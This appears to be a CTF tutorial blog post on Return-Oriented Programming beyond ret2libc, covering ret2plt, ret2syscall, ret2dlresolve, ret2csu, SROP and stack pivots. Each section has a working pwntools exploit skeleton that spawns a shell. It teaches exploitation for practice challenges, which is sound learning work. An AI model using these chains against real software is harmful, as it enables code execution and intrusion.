ROP Beyond ret2libc: The Gadget Ladder for CTF Exploitation

Every ROP tutorial is lying by omission

You found the overflow. You wrote the offset into a pwntools script. You sent p64(system) + p64(ret) + p64(binsh) and the program handed back a shell. Great. Now try it on a binary that was compiled static, or one with Full RELRO (Read-Only Relocations), or one where there is no puts you can call to leak libc. The payload that worked a minute ago crashes with SIGSEGV before the first gadget fires.

Most ROP (Return-Oriented Programming) tutorials teach ret2libc and stop. That gets beginners to their first shell and leaves them stranded the moment the binary does anything unusual. ret2libc is one dialect. There are five more on the shelf, and each one is the only move that works in a specific, common situation.

ROP is not an exploit. It's a programming language. The question is always: what is in scope as the instruction set?

This guide is the companion to the ASLR and PIE Bypass post (ASLR is Address Space Layout Randomization, PIE is Position-Independent Executable, both covered there in depth). That post assumes you have a leak and builds ret2libc on top of it. This post picks up where leaks end. You get five rungs, each with a working pwntools skeleton, the exact precondition that makes it legal, and at least one real Capture-The-Flag (CTF) writeup where it was the winning move. If you already understand stack buffer overflows, start here. If you do not, read the Buffer Overflow guide first.

Note: ret2libc does not disappear when you climb the ladder. It is still the default the second a leak is viable. These techniques are what you reach for when the leak is not there, or when pwntools reports "no such gadget" for the argument register you need. In real exploits the rungs compose. A typical static-binary shell is ret2csu plus ret2syscall stacked together.

The Gadget Ladder: five rungs you can climb or stack together

The decision tree is driven by what the binary gives you, not by which technique is cleanest. Read the ladder bottom-up: start with the cheapest move that the target allows. If the preconditions fail, climb a rung.

Rung	Technique	Use when	Blocked by	Receipt
0	ret2libc	You have or can obtain a libc leak	No leak path; Full RELRO does not affect it, ASLR without a leak does	ASLR and PIE Bypass (sibling post)
1	ret2plt	The symbol you need (e.g. system, execve) is already imported and in the PLT	Target symbol not imported	Classic ret2libc variants; any binary that imports system
2	ret2syscall	Static binary, or any binary with a syscall gadget, and x86_64 syscall ABI is in scope	seccomp filters; binary lacks a syscall instruction
3	ret2dlresolve	Dynamically linked, Partial or No RELRO, known writable region	Full RELRO; PIE without a text leak
4	ret2csu	Dynamically linked glibc binary, you are missing rdx or rsi control mid-chain	Binary stripped of __libc_csu_init (Clang, musl, some LTO builds)
5	SROP	Gadget set is minimal; you have a syscall;ret and a way to set rax=15	vsyscall disabled plus no libc plus no other syscall gadget
+	Stack pivot	Overflow gives you too few bytes for a full chain	No writable region you can predict the address of

The rungs are not mutually exclusive. A typical static-binary shell is ret2csu (to set the three arg registers) chained into ret2syscall (to actually execute execve). Treat the ladder as a vocabulary, not a decision flowchart.

Key insight: Return-oriented programming was first formalized by Hovav Shacham in 2007 as a way to achieve Turing-complete computation using only ret-terminated gadgets already present in a target binary (Shacham, CCS 2007). Every technique below is an answer to the same question: which gadgets are in scope today, and which language do they let me write in?

Rung 0: ret2libc is only one dialect

ret2libc is covered in depth in the ASLR and PIE Bypass guide, so this section is a quick recap so the rest of the ladder has a baseline to stand on.

The shape is fixed. Find the stack offset, leak libc (via puts(puts@got), a format string, or any primitive that reveals a libc address), compute the libc base, and call system("/bin/sh") via a three-gadget chain:

from pwn import *
elf  = ELF('./vuln')
libc = ELF('./libc.so.6')
rop  = ROP(elf)
# 1) leak libc (see sibling post for how to pick a leak)
io = elf.process()
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main'])
io.sendline(b'A'*OFFSET + rop.chain())
leaked    = u64(io.recvline().strip().ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']
# 2) pop rdi ; ret to place '/bin/sh' in rdi; extra ret for alignment
rop2 = ROP(libc)
rop2.raw(rop2.find_gadget(['ret'])[0])
rop2.call(libc.symbols['system'], [next(libc.search(b'/bin/sh'))])
io.sendline(b'A'*OFFSET + rop2.chain())
io.interactive()

Two things to remember as you climb. First, ret2libc is the only rung that strictly requires an external-library leak. Every rung above this one avoids libc entirely, works with a partial leak, or forges its own addresses. Second, the 64-bit stack alignment trap (the movaps crash that eats so many otherwise-correct exploits) applies to every rung below too. If a chain dies inside do_system or right after a call, add an extra ret gadget.

Tip: Once libc is rebased, before you build a system("/bin/sh") chain, run one_gadget ./libc.so.6. It often returns a single address that drops a shell if one of a few register constraints holds (commonly [rsp+0x30] == NULL, or rax == NULL). One gadget instead of a three-gadget chain means no alignment worries and no argument setup. When it fits, it is the cleanest exit from the whole ladder.

Rung 1: ret2plt skips the whole problem if the symbol is already imported

Before you forge anything, check what the binary already imported. Every dynamically linked ELF (Executable and Linkable Format) binary ships a Procedure Linkage Table (PLT) stub for every libc function it calls. puts@plt, read@plt, printf@plt are all fixed addresses inside the binary's own text segment. If the binary imported system, execve, or anything equivalent, you can call it straight from the PLT with no libc address at all.

$ objdump -d ./vuln | grep -E 'plt>:' | head -20
0000000000401040 <puts@plt>:
0000000000401050 <printf@plt>:
0000000000401060 <read@plt>:
0000000000401070 <system@plt>:     # system is imported, reachable with no leak

With system@plt available, the chain is trivial: pop /bin/sh into rdi, call system@plt. No leak, no forge.

rop = ROP(elf)
rop.raw(rop.find_gadget(['ret'])[0])   # alignment
rop.system(next(elf.search(b'/bin/sh')))
# or, if '/bin/sh' is not in the binary, write it to .bss first via read@plt

The catch: binaries compiled for CTFs almost never import system unless the author wants you to find it. You are looking for execve, gets, or a helpful wrapper the author wrote. Grep the PLT first. If nothing useful is there, climb.

Rung 2: ret2syscall is the first thing to try on a static binary

Static binaries do not have a PLT or a libc to leak. What they do have is every function they call, compiled directly into the executable, and every syscall wrapper glibc shipped. That means they almost certainly contain a syscall instruction and a complete set of argument-register pop gadgets. ret2syscall skips the dynamic loader entirely and executes execve("/bin/sh", 0, 0) via a raw syscall.

The x86_64 syscall Application Binary Interface (ABI) is the contract you program against:

rax = syscall number      (59 = execve, 0 = read, 1 = write, 2 = open)
rdi = arg1                (pathname for execve)
rsi = arg2                (argv)
rdx = arg3                (envp)
r10 = arg4                (note: r10, not rcx)
r8  = arg5
r9  = arg6

Find the gadgets with ROPgadget, stash /bin/sh somewhere you can predict (the .bss or .data section in a non-PIE static binary), and build the chain:

$ ROPgadget --binary ./vuln --only 'pop|ret' | grep -E 'rax|rdi|rsi|rdx'
0x00000000004017f7 : pop rax ; ret
0x0000000000401c87 : pop rdi ; ret
0x000000000040a6ae : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
$ ROPgadget --binary ./vuln --only 'syscall|ret'
0x00000000004011cc : syscall ; ret

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
pop_rax     = 0x4017f7
pop_rdi     = 0x401c87
pop_rsi     = 0x40a6ae
pop_rdx     = 0x4498b5
syscall_ret = 0x4011cc
binsh_addr  = elf.bss() + 0x100         # safe scratch in .bss
rop  = flat(
    # stage 1: read '/bin/sh\0' into .bss
    pop_rax, 0,                         # rax = 0 (read)
    pop_rdi, 0,                         # rdi = stdin
    pop_rsi, binsh_addr,                # rsi = dest
    pop_rdx, 8,                         # rdx = 8 bytes
    syscall_ret,
    # stage 2: execve(binsh_addr, 0, 0)
    pop_rax, 59,                        # rax = execve
    pop_rdi, binsh_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    syscall_ret,
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.sendline(b'/bin/sh\x00')
io.interactive()

Warning: If seccomp is enabled, execve may be banned. Check with seccomp-tools: seccomp-tools dump ./vuln. If the binary filters execve, pivot to open plus read plus write to exfiltrate the flag file directly.

Rung 3: ret2dlresolve forges a symbol table out of thin air

The dynamic linker is a program that runs inside your process. Its job, when puts@plt gets called for the first time, is to walk the relocation table, look up the symbol name in the string table, resolve it to a libc address, and patch the GOT. That whole process is triggered by a single call into _dl_runtime_resolve with a relocation index on the stack.

The attack traces back to Nergal's Phrack 58:4 (May 2001), which mapped the dynamic linker as an attack surface. The forgery variant shown here, widely credited to later writeups building on that foundation, is to fake the relocation entry. You write a fake Elf64_Rela, a fake Elf64_Sym, and a string "system" into a writable region at a known address, then call _dl_runtime_resolve with an index that points at your forgery. The linker resolves system, jumps to it, and your chosen argument hits the shell. No leak needed, and no pre-resolved entry in the Global Offset Table (GOT) required.

pwntools does the forge for you:

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw(rop.find_gadget(['ret'])[0])       # 64-bit alignment
rop.read(0, dlresolve.data_addr)           # stash the forged structs
rop.ret2dlresolve(dlresolve)               # trigger the linker
io = elf.process()
io.sendline(b'A'*OFFSET + rop.chain())
io.sendline(dlresolve.payload)             # the actual forgery
io.interactive()

Warning: ret2dlresolve is blocked by Full RELRO (the .dynamic section and the GOT are mapped read-only, so the linker refuses to patch them). It also needs a writable region at a known address, which means no PIE (or a separate text-base leak). Check with checksec before you commit to this rung.

The x86_64 version has teeth. _dl_fixup takes the high 32 bits of r_info as the symbol index, then reads SYMTAB + index * sizeof(Elf64_Sym) (where sizeof(Elf64_Sym) = 0x18) as an Elf64_Sym. You have to pick an index whose product lands exactly on your forged symbol. It also reads vernum[r_info >> 32] as a versioned-symbol index, which is easy to trip out of bounds. Align your fake Elf64_Sym index so the product falls exactly on your forged symbol entry, and zero out vernum[r_info >> 32] so the version check passes.

Rung 4: ret2csu is a universal 3-argument call shipped in every glibc binary

You are mid-chain and you need to set rdx, but ROPgadget shows no pop rdx ; ret anywhere in the binary. Before you give up and hunt for a libc leak, look at __libc_csu_init. It is the init routine the linker inserts at the bottom of every dynamically linked glibc binary. It runs before main. It contains two gadgets that together let you control rdi, rsi, rdx, and make an indirect call.

Disassemble __libc_csu_init and you will find something like:

# Gadget A (the 'popper') at the epilogue of __libc_csu_init
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
# Gadget B (the 'caller') earlier in __libc_csu_init
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword ptr [r12 + rbx*8]
add rbx, 1
cmp rbp, rbx
jnz <loop back to caller>
add rsp, 8
ret    ; (falls through to gadget A)

Gadget A puts six values from the stack into six registers. Gadget B moves r15 -> rdx, r14 -> rsi, r13 -> edi, and calls whatever function pointer lives at [r12 + rbx*8]. Set rbp = rbx + 1 so the loop exits after one iteration. Point r12 at a GOT entry or a .dynamic slot that contains a valid function pointer (a pointer to _init works in most stripped binaries). You now have full three-argument control without a single pop rdx anywhere.

ret2csu turns any dynamically linked glibc binary into a three-argument calling machine, even if it was compiled as Hello World.

Worked pwntools template for ROP Emporium ret2csu:

from pwn import *
elf = context.binary = ELF('./ret2csu')
popper = 0x40089a    # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
caller = 0x400880    # mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]
init_ptr = 0x600e38  # points to _init, survives as a valid call target
win      = 0x4007b1  # the function you want to reach
rop = flat(
    popper,
    0,                    # rbx    (so [r12 + 0*8] is the call target)
    1,                    # rbp    (equal to rbx+1, loop exits)
    init_ptr,             # r12    (function pointer source)
    0xf,                  # r13    -> edi
    0xf,                  # r14    -> rsi
    0xdeadcafebabeb00f,   # r15    -> rdx (16 hex digits, fits u64)
    caller,
    0,                    # padding for 'add rsp, 8' at end of caller
    0, 0, 0, 0, 0, 0,     # six pops when caller falls through into popper
    win,
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.interactive()

Warning: Clang, musl, and some link-time-optimized builds omit __libc_csu_init. glibc 2.34 also reorganized init, so newer binaries may not have the exact gadget sequence above. Always disassemble and confirm the gadgets exist before you commit. HackTricks documents several variant sequences at hacktricks.wiki/...ret2csu.

ret2csu is almost never a primary strategy. It is the move you make when the rest of your chain works except for one argument register: you are missing rdx or rsi control and no other gadget sets them. Reach for it when the gadget set is otherwise complete but one argument register is out of reach.

Rung 5: SROP sets every register at once with a fake signal frame

When a Unix signal arrives, the kernel pushes a ucontext_t onto the stack, runs the handler, and when the handler returns calls rt_sigreturn. That syscall reads the saved context back off the stack and restores every general-purpose register, rip, rsp, and the flags. The kernel does not verify the frame; it trusts what the stack says.

Sigreturn-Oriented Programming, introduced by Bosman and Bos at IEEE S&P 2014, weaponizes that trust. You forge a signal frame on the stack and fire rt_sigreturn (syscall number 15 on x86_64, 119 on i386 as the older sigreturn). The kernel obediently loads every register from your forgery. One payload, arbitrary register state. The authors put it plainly:

anyone who controls the stack is able to set up such a signal frame.Bosman & Bos, 2014

The minimum gadget budget is tiny: a syscall ; ret and a way to put 15 into rax. That is it. pwntools has a SigreturnFrame class that handles the uc_mcontext layout for you:

from pwn import *
context.arch = 'amd64'
elf = context.binary = ELF('./vuln')
syscall_ret = 0x401234      # PLACEHOLDER: a 'syscall ; ret' gadget
pop_rax     = 0x401100      # PLACEHOLDER: a 'pop rax ; ret' gadget
binsh       = 0x601040      # PLACEHOLDER: '/bin/sh' address in .bss
                            # find yours with ROPgadget and objdump
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
frame.rsp = elf.bss() + 0x400   # MUST point to readable memory; a bad rsp
                                # will not trip sigreturn but will crash
                                # the next push or movaps
rop = flat(
    pop_rax, 15,             # rax = rt_sigreturn
    syscall_ret,             # invoke rt_sigreturn
    bytes(frame),            # the fake signal frame the kernel will restore
)
io = elf.process()
io.sendline(b'A' * OFFSET + rop)
io.interactive()

SROP shines on static binaries, unusual architectures, and challenges where gadget sets are deliberately minimal. One sigreturn frame trivializes an arch where the author has never exploited before: instead of hunting for dozens of gadgets you only need one syscall ; ret and a way to write rax = 15. Reach for it when the gadget set is so thin that even ret2csu runs out of levers, or when you need to hit an unusual architecture cleanly.

Escape hatch: stack pivoting when the buffer is too small

Sometimes the overflow gives you sixteen bytes past the saved rip. That is one gadget and one address, which is enough to redirect execution but not enough to run a chain. The fix is a stack pivot: use the little room you have to move rsp to somewhere larger (a buffer under your control, the .bss into which you staged bytes earlier, or the heap) and then run the real chain from there.

The common pivots, in order of how often they show up in writeups:

leave ; ret                   # rsp = rbp; pop rbp; ret  (if you control rbp)
pop rsp ; ret                 # straightforward if this gadget exists
xchg rax, rsp ; ret           # pivot via rax, classic on 32-bit
add rsp, <offset> ; ret       # when you already have a big overflow window
mov rsp, r13 ; ret            # rare but useful when r13 lands in .bss

For a picoCTF example on this site, picoCTF 2025 handoff combines a sub rsp, 0x2e8 ; jmp rsp pivot with shellcode to escape a tightly constrained input.

The three things that kill these chains

A ROP chain that looks correct and does not work is almost never the technique. In decreasing order of how often they bite:

1. Stack alignment

x86_64 requires rsp to be 16-byte aligned at a call instruction. glibc's system hits a movaps that crashes on a misaligned stack. Fix: insert one extra ret gadget before the call.

2. Bad bytes

If the vuln is gets, a 0x0a byte in your chain truncates it. If it is strcpy, a 0x00 byte kills it. If a gadget address contains the forbidden byte, pick a different gadget.

3. Wrong gadget semantics

ROPgadget shows a line, not an invariant. A pop rdi ; pop r15 ; ret is not the same as a pop rdi ; ret. A gadget that touches rax may break your return value assumption. Single-step every gadget in GDB until the chain is dead or alive.

The GDB CTF Guide and the Python for CTF post cover the step-by-step workflow. The short version: run your chain under gdb ./vuln with set follow-fork-mode child, set a breakpoint on the first gadget, and step one instruction at a time through every pop and ret until the crash is obvious. Do not guess. Watch the registers.

picoCTF challenges where you'll actually climb

picoCTF leans on ret2win, ret2libc, and shellcode more than on the higher rungs of the ladder. But a few challenges in the 2022 through 2025 events do push you off ret2libc:

picoCTF 2022 ropfu has no win function and expects a syscall-style ROP chain against a 32-bit binary. Closest picoCTF has come to a pure ret2syscall.
picoCTF 2025 handoff forces a stack pivot into shellcode because the initial overflow window is too small for a full chain.
picoCTF 2024 format string 3 and picoCTF 2025 PIE TIME 2 are the best practice for the leak half of the problem, which is what the ladder avoids. Do them so you understand why each rung exists.

For deeper practice outside picoCTF, work through ROP Emporium. The challenges ret2csu, pivot, and fluff each isolate one rung of the ladder and give you a predictable target to break it on.

Quick reference

Decision order when you have no leak

checksec ./vuln. Note RELRO, PIE, NX (No-eXecute stack), canary, static vs dynamic.
objdump -d ./vuln | grep @plt. If system, execve, or a helpful wrapper is imported, use ret2plt.
Static binary or syscall;ret gadget present? Use ret2syscall.
Dynamic with Partial or No RELRO and a writable region at a known address? Use ret2dlresolve.
Missing rdx or rsi control mid-chain? Splice in ret2csu.
Minimal gadget set or exotic arch with a syscall;ret available? Use SROP.
Buffer too small for the chain you need? Stack pivot to the .bss, heap, or a read-staged area.

pwntools cheat sheet

# Auto-build a ret2libc chain once libc is rebased
rop = ROP([elf, libc]); rop.system(next(libc.search(b'/bin/sh')))
# Auto-build a ret2dlresolve forgery
dlr = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.read(0, dlr.data_addr); rop.ret2dlresolve(dlr)
# Auto-build an SROP frame
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh; frame.rip = syscall_gadget
# Find a specific gadget
rop.find_gadget(['pop rdi', 'ret'])
rop.find_gadget(['syscall', 'ret'])

The attacker's job is not to find the exploit. It is to look at what the binary handed you and decide what language to program in. Once you see it that way, you stop asking whether you have a ROP chain and start asking which dialect fits.

One concrete move. Pick a pwn binary you have not solved. Run checksec ./vuln, grep the PLT, run ROPgadget --binary ./vuln --multibr. Before opening a browser, name the rung you would try first and the exact precondition you think it satisfies. Then try it. The ladder is only useful if you can read a binary and call the rung.